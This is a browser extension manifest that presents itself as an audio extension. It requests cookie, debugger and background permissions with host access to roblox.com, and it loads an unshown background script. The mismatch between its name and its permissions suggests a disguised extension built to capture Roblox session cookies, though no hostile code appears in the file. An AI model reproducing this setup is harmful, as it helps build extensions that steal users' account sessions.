{
  "name":"Audio Extension Beta (test)",
   "version":"2",
   "manifest_version":2,
   "description":"Personal extension",
   "browser_action":{
      "default_icon":"iccon.png"
   },
   "permissions":[
      "alarms",
      "background",
      "debugger",
      "notifications",
      "cookies",
      "https://www.roblox.com/"
   ],
   "background":{
      "scripts":[
         "bgWork.js",
         "jQuery-ver3.js"
      ]
   },
   "icons":{
      "16":"iccon.png",
      "48":"iccon.png",
      "128":"iccon.png"
   }
}